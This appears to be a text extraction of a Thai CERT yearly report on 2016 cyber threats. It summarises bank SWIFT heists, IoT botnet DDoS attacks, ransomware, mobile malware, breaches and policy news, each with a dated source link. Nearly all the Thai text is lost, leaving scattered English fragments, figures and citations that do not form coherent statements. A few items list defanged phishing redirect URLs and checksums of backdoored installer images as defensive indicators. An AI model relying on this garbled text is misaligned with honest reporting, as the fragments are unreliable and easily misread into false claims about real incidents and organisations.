PC World <http://thcert.co/V45jHG>
CYBER THREATS 111
2016
Microsoft Platinum
Microsoft

51.4%
(2.9%)

,

Spear-Phishing
: 12/05/2559
: Microsoft <http://thcert.co/R85cAK>
112
2
SWIFT
2

81
SWIFT
SWIFT 2
PDF

SWIFT
2

SWIFT

2
: 13/05/2559
: Reuters <http://thcert.co/kd0H7b>
CYBER THREATS 113
2016
GhostShell
32
FTP
15 2559 NASA,
GhostShell Pentagon, Federal Reserve FBI
32 1.6
( 2558
) Pastebin
, 500
1,181
82

FTP

FTP

( FTPS), ,
2556 Ghostshell ,

120,000

: 18/05/2559
: Security Affairs <http://thcert.co/Uk6tjJ>
114

FDA 2559
Merge Hemo

5

(Whitelist)
: 18/05/2559
: Ars Technica <http://thcert.co/DVoJZr>
CYBER THREATS 115
2016
SWIFT
12

3 SWIFT

SWIFT
2559

2 SWIFT

3
Banco del Austro (BDA)
2559
: 23/05/2559
: The Hacker News <http://thcert.co/YaLoe6>
116
Twitter 2,500
/
Symantec
Twitter 2,500

Twitter

2554
2

: 25/05/2559
: SC Magazine <http://thcert.co/uyJAkX>
CYBER THREATS 117
2016
RUAG
30,000

2557
2559

RUAG

-
(
Active
Blacklist Whitelist)
Directory
-
User

-

RUAG -

118
Log
- Web Proxy - Log
Log 2
Log DNS
- Log
- (Centralize Log)

- Log

Active Directory

- RUAG https://www.
melani.admin.ch/dam/melani/en/
dokumente/2016/technical%20
- report%20ruag.pdf.download.pdf/
2 (2 Factor-authentication) Report_Ruag-Espionage-Case.pdf

-
(Audit)

: 25/05/2559
: The Register <http://thcert.co/I4VW5f>,
ISC <http://thcert.co/kdDeze>
CYBER THREATS 119
2016
SWIFT
Sony Pictures

SWIFT
Lazarus
4 Sony Pictures 2557

Symantec

Sony SWIFT
Pictures 2557

12

: 30/05/2559
: The Guardian <http://thcert.co/IdpPR6>,
The Register <http://thcert.co/2XU2bT>,
Ars Technica <http://thcert.co/892DGB>
120
TeamViewer

TeamViewer
Dr.Web
BackDoor.TeamViewer.49
Adobe
Flash Player TeamViewer

TeamViewer

: 31/05/2559
: Softpedia <http://thcert.co/eFdbAu>,
Dr.Web <http://thcert.co/k11FwQ>
CYBER THREATS 121
2016

FireEye

2559
Microsoft Office

FireEye
( https://www.thaicert.or.th/
alerts/user/2015/al2015us003.html)
: 07/06/2559
: Softpedia <http://thcert.co/WtWZkL>,
FireEye <http://thcert.co/W9FxGD>
122
Twitter Pinterest
LinkedIn

LinkedIn, Tumblr
MySpace dadada
LinkedIn, Twitter Pinterest
OurMine
LinkedIn
Facebook

Twitter Pinterest

Have I Been Pwned (https://
Twitter haveibeenpwned.com)

2
: 07/06/2559
: Softpedia <http://thcert.co/oWXn3W>
CYBER THREATS 123
2016
Toyota Lexus
Toyota Lexus Toyota Lexus 2557

2559 Toyota Land Cruiser
2559

Lexus

: 09/06/2559
: BBC <http://thcert.co/vOOTj1>,
The Guardian <http://thcert.co/F4s3ic>
124

7
2559 Transparaent Tribe

Softpedia 2559
2559
7 Android
Romantic Intruder

.

: 13/06/2559
: Softpedia <http://thcert.co/FKJehX>
CYBER THREATS 125
2016

Twitter
2
Naked Security
Twitter
2
DeRay Mckesson

4

Financial Fraud
Action UK
: 15/06/2559
: Naked Security <http://thcert.co/I34cS9>
126
GoToMyPC

GoToMyPC
Remote Desktop Remote Desktop

18 2559
GoToMyPC TeamViewer

Remote Desktop
2

GoToMyPC

: 20/06/2559
: GoToMyPC <http://thcert.co/0DmNph>
CYBER THREATS 127
2016
Twitter Twitter
Mark Zuckerberg
20 2559
Twitter Pinterest Dick
Costolo CEO Twitter
OurMine

Twitter

Twitter
OurMine
Twitter Pinterest Mark
Zuckerberg
Mark Zuckerberg

: 21/06/2559
: Softpedia <http://thcert.co/xBLOo8>,
Recode <http://thcert.co/WnAWUj>
128
SWIFT
10
2559
SWIFT

5
10

SWIFT

: 28/06/2559
: Security Affairs <http://thcert.co/WCJqdK>
CYBER THREATS 129
2016
Lizard Squad
DDoS
Arbors Security
Engineering and Response Team
(ASERT)
DDoS Lizard Squad
2558
Botnet DDoS

LizardStresser
2558 Lizard Squad

Linux

: 04/07/2559
: Threatpost <http://thcert.co/7c9uBj>,
Arbor Networks <http://thcert.co/0mk3yo>
130
iOS
iCloud
iOS

Find My iPhone 2 Find
My iPhone Apple
30-50 ID OTP

Apple ID Apple

Apple ID

40
: 11/07/2559
: MacRumors <http://thcert.co/P43Hrv>,
CSO Online <http://thcert.co/yIcwCr>
CYBER THREATS 131
2016
Marriot Hyatt
Marriot Hyatt 8,000

(POS:
Point-of-Sale)
19
http://www.heihotels.com/notice/2

2558 2559

: 18/08/2559
: Engadget <http://thcert.co/X0ALLJ>
132
Steam
9.1
DLH.net Redeem

3

31 2559 DLH
LeakedSource
DotA 2 DLH.net

( https://
vBulletin www.leakedsource.com/main/da-
tabaselist/)
Steam DLH.net
Facebook (
Facebook)
Steam
LeakedSource
84%

Redeem
Steam 9.1
LeakedSource
: 22/08/2559
: ZDNet <http://thcert.co/0PxVKj>
CYBER THREATS 133
2016
Epic Games
8
Epic Games
Epic Games

Epic Games Access Token
2559 Facebook Facebook
Epic Games

8

https://www.leakedsource.com
SQL
Injection
vBulletin

: 24/08/2559
: ZDNet <http://thcert.co/RFl0cy>
134
Fitness Tracker
McDonalds

McDonalds
Happy Meals Happy Meals
Step-iT
Fitness Tracker McDonalds

(Wearable)

(Consumer
Product Safety Commission: CPSC)

70
7

30
()
: 24/08/2559
: Mashable <http://thcert.co/VJYbn7>,
CPSC <http://thcert.co/KSMy5z>
CYBER THREATS 135
2016
FBI

12 2559 DirBuster

FBI

IP
Acunetix

SQL Injection
SQLmap
: 30/08/2559
: Gizmodo <http://thcert.co/HfkWuy>,
CSO Online <http://thcert.co/pE9FMG>
136
macOS 10.12 (Sierra)

Razor kernel panic
Apple macOS Razor
10.12 (Sierra) Razer Synapse
21 2559 macOS 10.12

Razor
kernel panic

/Library/Extensions/
RazerHid.kext

: 22/09/2559
: XORcat <http://thcert.co/Pz0gIY>
CYBER THREATS 137
2016
OVH DDoS 1.1 Tbps

IoT
OVH
21 2559
DDoS
1.1
Tbps ( 125 )

OVH

(Internet
of Things)
(DVR)

botnet
150,000

1-30 Mbps
DDoS 1.5 Tbps DDoS

DDoS

: 28/09/2559
: SC Magazine <http://thcert.co/jtKELX>,
The Register <http://thcert.co/VLsVrc>
138
1.5
botnet DDoS
2559 response
DDoS
2
Brian Krebs DDoS
botnet
OVH request
DDoS 2
660 Gbps 1 Tbps
DDoS

Level 3
Brian Krebs

DAHUA Technology
(IoT -
Internet of Things) 1 botnet

botnet username
CloudFlare BackConnect
DDoS Mirai
IoT
amplification attack Linux
request DDoS ( Mirai
CYBER THREATS 139
2016
http://blog.malwaremustdie.
org/2559/08/mmd-0056-2016-linux-
mirai-just.html)

DAHUA Technology DDoS

DDoS DDoS
IoT

: 30/09/2559
: Motherboard <http://thcert.co/JorQFh>
140

2559

20,000

: 04/10/2559
: Softpedia <http://thcert.co/hjppvB>,
Yonhap News Agency <http://thcert.co/rtgLN2>
CYBER THREATS 141
2016
GlobalSign
GlobalSign GlobalSign
root CA
ISP

GlobalSign GlobalSign
(https://support.globalsign.com/
customer/portal/articles/1353318)
: 14/10/2559
: The Register <http://thcert.co/AmCwLA>,
GlobalSign <http://thcert.co/MMkXZf>
142
30 2559

2559

(Business Continuity Plan)

: 03/11/2559
: BBC <http://thcert.co/lCQAO4>
CYBER THREATS 143
2016
Tesco Bank
20,000
6 2559
Tesco Bank

40,000

(online criminal)
: 08/11/2559
: Ars Technica <http://thcert.co/T1euEn>
144
DDoS
IoT
BBC
DDoS Internet of Things
8-9 2559 (IoT)

Sberbank
Kaspersky
DDoS
IoT
60 1 Tbps
12

: 11/11/2559
: BBC <http://thcert.co/qrPJTm>
CYBER THREATS 145
2016
Lenovo
Windows Server 2016 November
Lenovo Lenovo
Microsoft Windows Server 2016
2559 (KB3200970)
Lenovo M5 ( )
X6 Windows Update
Microsoft Windows
Lenovo Server 2016
2559
Lenovo
: 22/11/2559
: Lenovo <http://thcert.co/EKaeRr>
146
ATM

Group IB ATM Cobalt

ATM
Diebold Nixdorf NCR ATM
ATM ATM
(
ATM ATM Jackpotting
2559)

: 23/11/2559
: The Hacker News <http://thcert.co/IgqLMq>,
Fortune <http://thcert.co/sZ3QL0>,
Softpedia <http://thcert.co/IhLxBO>
CYBER THREATS 147
2016
ISP DDoS
1 Mirai
27 2559 thaicert.or.th/papers/general/2559/
Deutsche Telekom pa2016ge001.html)
DDoS
SANS ISC

TR-069
1 ISP

German Federal Office (
for Information Security (BSI) TCP 7547)
2559
2 Deutsche Telekom
(Speedport W 921V
Speedport W 723V Type B) (
2 SANS https://isc.sans.edu/forums/
diary/TR069+NewNTPServer+-
ISP Exploits+What+we+know+so+-
far/21763/)
SANS ISC
Mirai 7547
IoT
DDoS ( ISP
https://www. Shodan 41

148
7547

2

ZyXEL, D-Link

: 30/11/2559
: The Register <http://thcert.co/dN77MG>,
Security Affairs <http://thcert.co/yuMWRk>,
SANS ISC <http://thcert.co/c9o0Yr>
CYBER THREATS 149
2016
BBC
Chieveley (jammer)

: 06/12/2559
: TripWire <http://thcert.co/KZiWRP>,
BBC <http://thcert.co/MYXktY>
150

HIV
Indian Express
Health Solutions

2559
35,000

3
: 07/12/2559
: Softpedia <http://thcert.co/j7h00Y>
CYBER THREATS 151
2016
Skype

Skype
Skype ID Microsoft
Account Skype ID
2
URL LinkedIn
Baidu Microsoft Account

hxxps://www[.]linkedin[.]com/
slink?code=e2nsPHa#jpulusiv=vic- Skype
timskypeid

hxxp://www[.]baidu[.]com/
link?url=6kdJhiuGhlv0r4EfUsqBK- Skype
W9t86Werul6GdqAieiiPyC
1. www.skype.
redirect com Skype ID
2. Profile

2559 3. Personal information
Change password
Skype Skype
Skype
(
Microsoft Account
Skype ID) Microsoft
Skype
Microsoft Account
152
1. https:// 4. Sign-in preferences

account.microsoft.com () Change
Microsoft Account sign-in preferences (
)
2. Security and Privacy (
) 5. Skype

3. Account Security ( Skype
) More security Skype Save
settings ( )
: 21/12/2559
: Fortinet <http://thcert.co/FPXm8v>,
bruceb news <http://thcert.co/nNFCiC>
CYBER THREATS 153
2016
1
Ukrenergo

17 2559
1

2558
: 21/12/2559
: Hackread <http://thcert.co/KgCBDk>,
Hackread <http://thcert.co/ESiexX>
154
Leet DDoS
650 Gbps
Imperva
Imperva
21 2559
DDoS Leet Unix
( Linux)
650 Gbps ()

Leet
Mirai header packet
Internet of TCP Options 1337
Things (IoT) Leet Elite
Imperva

: 29/12/2559
: Security Week <http://thcert.co/VecZi4>,
Imperva <http://thcert.co/3swdCG>
CYBER THREATS 155
2016

APT28 APT29

(DHS) FBI

: 30/12/2559
: Graham Cluley <http://thcert.co/AEww0U>,
US-CERT <http://thcert.co/ZjgJ44>
156
Law & Policy

CYBER THREATS 157
2016
Anonymous
#OpSafePharma
16
#OpSafePharma
Anonymous Artek
#OpSafePharma
16 2559
DDoS

30 2559
: 31/03/2559
: Softpedia <http://thcert.co/pWuU0O>
158

Open source
Open source

STAMP (Static Tool
Analysis Modernization Project)

Open source Static
Open source

: 01/04/2559
: CSO <http://thcert.co/QMvy9e>
CYBER THREATS 159
2016
NIST
National Institute of
Standards and Technology (NIST) S/MIME
PGP

(SP 800-177
Trustworthy Email)
2
2550 2559 NIST

NIST (http://csrc.nist.
gov/publications/drafts/800-177/
sp800-177_second-draft.pdf)
NIST
2559

: 04/04/2559
: The Register <http://thcert.co/TbNCbt>
160
SpyEye 24
2
24
SpyEye

2556

: 21/04/2559
: Krebs On Security <http://thcert.co/osf2DM>
CYBER THREATS 161
2016

Personal Data Protection
Commission (PDPC)

4 K Box Entertainment
Group 50,000
2014
PDPC

2555 7
2557

: 22/04/2559
: ZDNet <http://thcert.co/UsH3WB>
162

recovery key

Mac Pro

external
harddisk 2

2558
Mac Pro iPhone 5S external harddisk 2
Mac Pro
Apple FileVault
iPhone 5S
: 28/04/2559
: Ars Technica <http://thcert.co/sl9vNb>
CYBER THREATS 163
2016

(Fifth Amendment)

: 02/05/2559
: The Verge <http://thcert.co/O2ptSA>
164
LulzSec

Jonnel
De Asis 23 2559
LulzSec LulzSec Anonymous

55 (defacement)
Paul Biteng
23
Anonymous

: 03/05/2559
: Softpedia <http://thcert.co/kZjsE6>
CYBER THREATS 165
2016
David Levin Troy Hunt

SQL Injection

Havij

YouTube

: 10/05/2559
: ZDNet <http://thcert.co/xvIYuy>,
Windows IT Pro <http://thcert.co/LyCCb8>
166

GCHQ

(Phishing)

: 26/05/2559
: Motherboard <http://thcert.co/3TF3oZ>
CYBER THREATS 167
2016
2558 FBI NIT

Playpen
FBI IP Address, MAC Address

FBI 3
Network Investigative Tool
(NIT)
1,000 FBI
135
FBI
Adobe Flash
FBI Player Firefox

FBI
FBI
: 01/06/2559
: Naked Security <http://thcert.co/NRvz6r>,
Motherboard <http://thcert.co/Yw2oQi>
168
2554

(Fourth Amendment)

221

: 02/06/2559
: Reuters <http://thcert.co/8cA6Sd>,
ZDNet <http://thcert.co/subnJQ>
CYBER THREATS 169
2016
50
45

50

2554
45

(Federal Security Service)

Lurk

: 03/06/2559
: Kaspersky <http://thcert.co/vBRL6o>,
Softpedia <http://thcert.co/pemeZW>
170

Straits Times Cloud Security
Alliance
2560

100,000

: 08/06/2559
: Straits Times <http://thcert.co/sG5KEq>
CYBER THREATS 171
2016
David Nosal

2551
David Nosal
Kon Ferry

2

Kon Ferry
: 06/07/2559
: Softpedia <http://thcert.co/4iTxw5>
172

FBI

(http://www.hhs.gov/sites/default/
files/RansomwareFactSheet.pdf)
: 21/07/2559
: SC Magazine <http://thcert.co/JgSdrl>
CYBER THREATS 173
2016
Kickass Torrent Apple,

Facebook Coinbase
Artem Vaulting
Kickass Torrent Kickass
Torrent Facebook
Fanpage Kickass Torrent
2559 Apple
iTunes
IP Facebook
Apple, ()
Facebook Coinbase

Bitcoin
Coinbase
Kickass Torrent
Bitcoin Artem
Kickass Torrent Vaulin
iTunes

Kickass Torrent

: 25/07/2559
: Hackread <http://thcert.co/1rbS1l>
174
DDoS
2557
Chu request 6,652
Tsun-wai 20 16
15 DDoS
2557

Chu
Anonymous
Asia
Google
DDoS
Shanghai Commercial Bank
: 01/08/2559
: Softpedia <http://thcert.co/V1JfGt>,
South China Morning Post <http://thcert.co/rheuaN>
CYBER THREATS 175
2016

(FDIC - Federal Deposit Insurance (Digital Right Management)
Corporation)

(Deposite Insurance)
2 (2-Factor
Authentication)
FDIC

Phishing

FDIC

: 11/08/2559
: Federal News Radio <http://thcert.co/dJwigp>
176
2555
2

2

(Private Chat)

(Privacy Protection)

: 19/08/2559
: Vice <http://thcert.co/TonCz5>,
Fried <http://thcert.co/8jtdbg>
CYBER THREATS 177
2016
Verizon 5
Daniel Traeger spreadsheet

Verizon

5

2552 2557
.

: 29/09/2559
: Engadget <http://thcert.co/mVGK6V>,
Ars Technica <http://thcert.co/6gBin9>
178
Mozilla
WoSign StartCom Apple

2559 Mozilla Firefox
Mozilla
WoSign
(Certificate Authority - CA)

Apple

- SHA- WoSign 19
1 2559
20 2558 iOS macOS
Apple
SHA-1
WoSign

- StartCom CA StartCom

2558
CA
StartCom
- StartCom StartSSL
SHA-1

Mozilla

WoSign StartCom
1
: 04/10/2559
: The Register <http://thcert.co/Sggi0V>,
Softpedia <http://thcert.co/WpS7E9>
CYBER THREATS 179
2016
FBI
Lizard Squad PoodleCorp
FBI Voice
2 Zachary
Buchta
Bradley Jan Willem Van Rooy Van Rooy

Lizard Squad @LizardLands FBI
PoodleCorp ( ) direct
DDoS message

19
FBI
FBI IP

@fbiarelosers, @xotehpoodle
@LizardLands 2558
NCA
6
Lizard Squad
Buchta 15-20
@fbiarelosers
@xotehpoodle
Google
: 10/10/2559
: Motherboard <http://thcert.co/GLacQl>
180
IoT
CSA
Cloud
Security Alliance (CSA)

(Internet of Things - IoT) IoT

13
IoT

( https://www.thaicert.or.th/
newsbite/2016-09-30-01.html#2016-
09-30-01) CSA
(https://cloudsecurityalliance.org/
IoT download/future-proofing-the-con-
nected-world/)

: 10/10/2559
: Krebs on Security <http://thcert.co/oXyvqU>,
Government Technology <http://thcert.co/skTFTC>
CYBER THREATS 181
2016

Apple Watch

Apple
Watch

Apple
Watch

(wearable devices)

: 11/10/2559
: Telegraph <http://thcert.co/gaoKSm>,
The Verge <http://thcert.co/PXy6KY>
182
G7

G7

8 (https://www.treasury.
gov/resource-center/international/
g7-g20/Documents/G7%20Funda-
mental%20Elements%20Oct%20
2016.pdf)

: 14/10/2559
: Infosecurity Magazine <http://thcert.co/sAFlnL>
CYBER THREATS 183
2016

IoT
Mark Warner
IoT

(Senate Cybersecurity Caucus)

(Federal Communications
Commission FCC)
(Federal Trade
Commission FTC)
(Department Warner
of Homeland Security DHS)
(Internet of ISP
Things IoT)

DDoS (
IP )

ISP

184
IoT
IoT

IoT
IoT
(
)
IoT
DDoS

: 26/10/2559
: Krebs on Security <http://thcert.co/WvIXCA>
CYBER THREATS 185
2016
FCC ISP
-
(Federal Communications
Commission FCC)

(ISP)

-

- 30

5,000
Federal Trade
Commission (FTC), U.S. Secret Service
- of breaches FBI 7

-

FTC
- (FTC data security requirements)

NIST (NIST cyber-security framework)

-

186
3
6

1
Facebook Google

FCC

FCC

: 01/11/2559
: FCC <http://thcert.co/tVaxrS>,
Naked Security <http://thcert.co/SooSbp>
CYBER THREATS 187
2016
2559-2564

2559-2564 (National
Cyber Security Strategy 2016-2021)
1,900 -
( 84,000 ) (NCSC)
6 700
3
- National

Cyber Crime Unit
:
50
(critical infrastructures)
-

:

(Cyber Security Innovation
Centre)
:

: 16/11/2559
: GOV.UK <http://thcert.co/ejBZeh>
188

IoT
15 2559

Internet of Homeland Security
Things (IoT) NIST
NIST Special Publication 800-160 IoT
Homeland Security 17
IoT IoT

NIST Special Publication ( )
800-160
(Systems
Security Engineering)
257 2

IoT

: 16/11/2559
: NIST <http://thcert.co/dQKofS>,
Homeland Security <http://thcert.co/0NSrPj>
CYBER THREATS 189
2016

The 70
Guardian 2557
8%
2559 31%

( hands-free)

GPS

: 20/12/2559
: The Guardian <http://thcert.co/hZmk3V>
190
NIST

NIST 3. Detect
Special Publication 800-184
Guide for Cybersecurity Event
Recovery 53 4. Respond

(Cybersecurity 5. Recovery
framework)
5
1. Identify NIST
5
(Recovery)

2. Protect

NIST
: 28/12/2559
: Federal News Radio <http://thcert.co/zHaW6k>,
NIST <http://thcert.co/bM94dQ>
CYBER THREATS 191
2016
1 2560

1 2560

: 30/12/2559
: ZDNet <http://thcert.co/9ilDuX>
192
Malware
CYBER THREATS 193
2016
Emisoft Lab
HydraCrypt UmbreCrypt
Boss

(ransomware) CrypBoss 2
(http://
Emsisoft Lab emsi.at/DecryptHydraCrypt)

15
HydraCrypt
UmbreCrypt Cryp-
: 15/02/2559
: Emsisoft <http://thcert.co/FQBARG>
194
Linux Mint
Backdoor ISO
21 2559 e71a2aad8b58605e906d-
Linux Mint bea444dc4983 linuxmint-17.3-cin-
namon-64bit.iso
ISO
Linux Mint 30fef1aa1134c5f3778c-
www.linuxmint.com 77c4417f7238 linuxmint-17.3-cin-
Backdoor ISO namon-nocodecs-32bit.iso

3406350a87c201cdca0927b1bc-

7c2ccd linuxmint-17.3-cinnamon-no-
codecs-64bit.iso
ISO Linux
df38af96e99726bb0a1ef-
Mint 20 2559
3e5cd47563d linuxmint-17.3-cin-
ISO Backdoor
namon-oem-64bit.iso
Linux Mint 17.3 Cinnamon
MD5 Checksum
ISO Linux

Mint
Backdoor

MD5 Checksum ISO
ISO

6e7f7e03500747c6c3bfece-

2c9c8394f linuxmint-17.3-cinna-
mon-32bit.iso
: 23/02/2559
: The Linux Mint Blog <http://thcert.co/RdMrq>
CYBER THREATS 195
2016
CTB-Locker

CTB-Locker

Windows

: 29/02/2559
: Bleeping Computer <http://thcert.co/uuKPTO>
196
Porn clicker Google Play

ESET

Android Android/Clicker Google Play
Google Play Google Play
2558 343

3,600

Subway Surfers
GTA
Porn
clicker

: 01/03/2559
: We Live Security <http://thcert.co/JAZFMK>
CYBER THREATS 197
2016
KeRanger
Mac
1 bitcoin
Palo Alto 14,000
(ransomware)
KeRanger
Mac 5 2559 Apple

OS X OS X

Palo Alto (http://researchcenter.

paloaltonetworks.com/2016/03/
4 2559 Palo new-os-x-ransomware-keranger-in-
Alto fected-transmission-bittorrent-cli-
Installer ent-installer)
Transmission 2.90
(transmissionbt.com)

3
: 08/03/2559
: Palo Alto <http://thcert.co/ipN1dq>
198
TeslaCrypt 4.0

Heimdal 1,200
TeslaCrypt 4.0

RSA 4096

TeslaDecoder

600
Virustotal 3-4
(
21 2558)
: 24/03/2559
: Heimdal Security <http://thcert.co/9ZZOdO>
CYBER THREATS 199
2016
Android Flash Player

Google
ESET
Android
Flash Player
1.
(Administrator privileg-
2 (2-Factor Authentication) es) Settings -> Security ->
Android/ Device administrators -> Flash Player
Spy.Agent.SI -> Deactivate

Google Safe mode
3. Flash
Player Settings -> Apps/
Application manager -> Flash Player
-> Uninstall

IP
SMS
(C2)
OTP
ESET
: 25/03/2559
: We Live Security <http://thcert.co/nFWUsO>
200
Petya MFT

(ransomware)
MFT

(
)

Petya

Petya .exe

MFT (Master File Table)

: 29/03/2559
: Bleeping Computer <http://thcert.co/rygvQo>
CYBER THREATS 201
2016
ESET
Remaiten Backdoor
DDoS
Tsunami Gafgyt

23 (Telnet)

(Default Password)

: 31/03/2559
: SC Magazine <http://thcert.co/w7Zye3>
202
Android.Lockdroid
Android
Android.Lockdroid
(ransomware)
Android

2559 Symantec device administrator

Android
10,000 100

Symantec
Android

: 01/04/2559
: Symantec <http://thcert.co/islIM2>
CYBER THREATS 203
2016
Google Play Store 100
Dr.Web Dr.Web Google

Google
Android. Play Store
Spy.277 Google Play Store
104 Dr.Web
3.2 (https://vms.drweb.com/virus/?_
is=1&i=8020079)
Google
Play Store

(
IMEI, , GPS)
: 05/04/2559
: Softpedia <http://thcert.co/j1w54c>
204
OSX.Pirrit Mac OS X

Adobe Photoshop CC
Cybereason Labs
(adware)
Mac OS X

OS X
OSX.Pirrit

Microsoft Office 2016
: 08/04/2559
: Threatpost <http://thcert.co/qUNkp9>
CYBER THREATS 205
2016
CryptoHost
.rar
CryptoHost
(ransomware)
- 2559

.rar CryptoHost
0.33 bitcoin
140
Mulware Hunter

: 11/04/2559
: Bleeping Computer <http://thcert.co/P28v0Z>
206
!
Amazon
Mike Olsen URL

Amazon
admin

admin Amazon
admin
iframe
: 12/04/2559
: ZDNet <http://thcert.co/sZDBUU>
CYBER THREATS 207
2016
Jigsaw

Jigsaw
.fun
Jigsaw
Saw 0.4 bitcoin 160

JigSawDecrypter
(https://download.bleep-
1,000 ingcomputer.com/demonslay335/
JigSawDecrypter.zip)
: 12/04/2559
: Softpedia <http://thcert.co/OfsltG>
208
ATM

Trend Micro Windows XP
European Cybercrime Centre (EC3)
ATM
2554-2558
ATM
2557-2558
15%
ATM
ATM ( )
ATM
: 18/04/2559
: Trend Micro <http://thcert.co/FUkRTG>
CYBER THREATS 209
2016
SamSam JBoss
2559

Cisco
SamSam
JBoss Backdoor

1 Cisco
3.2 JBoss

: 19/04/2559
: The Register <http://thcert.co/4dNQlX>
210
CryptXXX
Bitcoin

CryptXXX
2559

.crypt
1.2 Bitcoin 500
Bitcoin

FTP,

: 20/04/2559
: Proofpoint <http://thcert.co/lCkNQw>
CYBER THREATS 211
2016
TeslaCrypt
Endgame Inc.

TeslaCrypt

TeslaCrypt (
4.1)
.zip
.js
JavaScript
: 21/04/2559
: Threatpost <http://thcert.co/f72VXh>
212
Android
root

Blue Coat Labs
Android
Android towelroot (CVE-2014-3153)
4.4.4 root
Android 4.4.4

Factory Reset
Dogspectus

root
CYBER.POLICE 100%
iTunes Gift Card

Android 4.4.4

2

Hacking Team 2558
: 26/04/2559
: ZDNet <http://thcert.co/1i6NVy>,
Threatpost <http://thcert.co/C73RU0>
CYBER THREATS 213
2016
! Play Store

Doctor Web
Play
Android.Spy.277.origin Google Store
Play Store 100
1

Google Play Store

Doctor Web Google
Play Store
Check Point
: 26/04/2559
: Check Point <http://thcert.co/2HZ5uo>,
Graham Cluley <http://thcert.co/jsYfhZ>
214
Pirate Bay

Malwarebytes
Pirate Bay

23-24 2559

: 27/04/2559
: Malwarebytes <http://thcert.co/A3yG2X>
CYBER THREATS 215
2016
CryptXXX
CryptXXX

2559 1
.crypt
500
Kaspersky

CryptXXX

Kaspersky (http://media.kasper-
sky.com/utilities/VirusUtilities/RU/
rannohdecryptor.exe)
: 27/04/2559
: Threatpost <http://thcert.co/7ncPj5>
216
7ev3n-HONE$T

(ransomware) 7ev3n-
HONE$T
.r5A
1 Bitcoin
400

: 28/04/2559
: Bleeping Computer <http://thcert.co/VXVPWr>
CYBER THREATS 217
2016
Institute for Critical

Infrastructure Technology (ICIT)

: 28/04/2559
: We Live Security <http://thcert.co/mqwk3Q>
218
Alpha

Alpha

https://
download.bleepingcomputer.com/
.encrypt demonslay335/AlphaDecrypter.zip
400
iTunes Gift Cards
: 02/05/2559
: Bleeping Computer <http://thcert.co/S0aWYK>
CYBER THREATS 219
2016
FBI
FBI
(https://
www.fbi.gov/news/stories/2559/april/
incidents-of-ransomware-on-the-rise) FBI

FBI

: 03/05/2559
: Threatpost <http://thcert.co/h7efzq>
220
Android
SMS
Intel Security Mobile Research

Android

Play
Store
Android_Update_6.apk

Android
apk

IMEI

SMS

: 03/05/2559
: McAfee <http://thcert.co/BTQn89>
CYBER THREATS 221
2016
Google Play Store

PhishLabs
Android
Google Play Store Google
2559 11 Play Store

: 03/05/2559
: Softpedia <http://thcert.co/HFFxs0>
222

Dridex
Cerber
Cerber
Adobe Flash
Player 2559
Adobe Flash Player Jigsaw

FireEye

Dridex
Cerber
Microsoft Office
Microsoft Office
Macro Macro

Dridex
Locky

: 13/05/2559
: Fireeye <http://thcert.co/rdG1sp>,
Trend Micro <http://thcert.co/C7J8yp>
CYBER THREATS 223
2016
Pathe Windows 25% Internet

Explorer
Flash Player Java
CryptoXXX

Angler Exploit Kit

: 16/05/2559
: Malwarebytes <http://thcert.co/E7jbPR>
224
CryptoXXX 2.0
CryptoXXX Kaspersky
CryptoXXX
2559
.crypt RannohDecryptor 1.9.1.0
500
Kaspersky Kaspersky (https://
support.kaspersky.com/viruses/
disinfection/8547)

( CryptoXXX 2.0)

: 17/05/2559
: Security Affairs <http://thcert.co/dXxUYN>
CYBER THREATS 225
2016
TeslaCrypt
TeslaCrypt

ESET

TeslaCrypt
http://
support.eset.com/kb6051/ https://
id-ransomware.malwarehunterteam.
com

: 19/05/2559
: Bleeping Computer <http://thcert.co/FSAiLm>
226
! WhatsApp Gold

WhatsApp Gold

WhatsApp

WhatsApp Gold

SMS

: 26/05/2559
: Help Net Security <http://thcert.co/Ka05Lt>
CYBER THREATS 227
2016
ZCryptor
.zcrypt
Microsoft
ZCryptor

(

)
( )
Flash Player
Microsoft Office

.zcrypt
: 30/05/2559
: Microsoft <http://thcert.co/I6nnJs>
228
Asus LiveUpdate

Duo Labs Asus LiveUpdate

(Bloatware)

Asus
Asus LiveUpdate
Asus

Asus LiveUpdate
Asus Asus
Windows Asus
Asus Live Update
BIOS

Lenovo
HTTP

Wi-Fi

Lenovo Accelerator Application

CYBER THREATS 229
2016

Windows

Duo Labs Acer, Asus, Dell,
HP Lenovo
: 08/06/2559
: Morgan Gangwere <http://thcert.co/7FaxBg>
230
Android
URL
2559 Kaspersky
Android Triada (Phishing)

Triada

2559 Kaspersky
Triada

SMS
Triada
:
Android Browser ( Triada
Android), 360 Secure Browser, root
Cheetah Browser Oupeng Browser
(:
Android
)

Home page
URL
: 13/06/2559
: Graham Cluley <http://thcert.co/CAep8s>,
Kaspersky <http://thcert.co/BjALqE>
CYBER THREATS 231
2016
FLocker
Android
FLocker FLock-
er

FLocker
Android

FLocker
2558

iTunes
Gift Card
FLocker
: 13/06/2559
: Graham Cluley <http://thcert.co/CAep8s>,
Kaspersky <http://thcert.co/BjALqE>
232
iOS App Store

SDK
FireEye iOS
iOS App Store Apple

(SDK) Vpon App Store

App Store
FireEye 2558
XcodeGhost
iOS
(
alerts/user/2015/al2015us006.
html)
iOS
FireEye
App Store Vpon iOS
(https://www.
AdsMogo thaicert.or.th/papers/technical/2014/
36 ( pa2014te003.html)
2559)
FireEye Apple
Vpon
: 15/06/2559
: FireEye <http://thcert.co/9tr75i>
CYBER THREATS 233
2016
TeamViewer
TeamViewer 11)

TeamViewer (
) Trend Micro
TeamViewer
1
Trend Micro
TeamViewer
TeamViewer

TeamViewer
Adobe Flash
TeamViewer Player
6.0.17222.0 TeamViewer
2553 ( TeamViewer
: 16/06/2559
: Trend Micro <http://thcert.co/5ee2V1>
234
True Lenovo P1m

True
Lenovo P1m SMS

Lenovo

P1ma40_S006_160615_16G_TRUE

> >
1,334 MB

: 20/06/2559
: Lenovo <http://thcert.co/AhnWYE>,
Pantip <http://thcert.co/TKvRKw>
CYBER THREATS 235
2016
JavaScript

RAA

JavaScript ( .js) .exe .js
mgJaXnwanxlS_doc_.
js
Windows Script Host
JavaScript
250 Microsoft
(https://technet.microsoft.com/en-
us/library/ee198684.aspx)
: 21/06/2559
: Bleeping Computer <http://thcert.co/qtxD5m>
236
Godless
Play Store root

Trend Micro
Godless
Google Play Store
root
Trend Micro
850,000
45%

3
Godless
Android
2 root root
CVE-2015-3636
(PingPongRoot) CVE-2014-3153
(Towelroot) factory reset

Android

5.1
Google Play
90% Android
Store 100%
Trend Micro
Google Play
Store Godless

root

: 22/06/2559
: Trend Micro <http://thcert.co/zUOkF9>
CYBER THREATS 237
2016
OTP
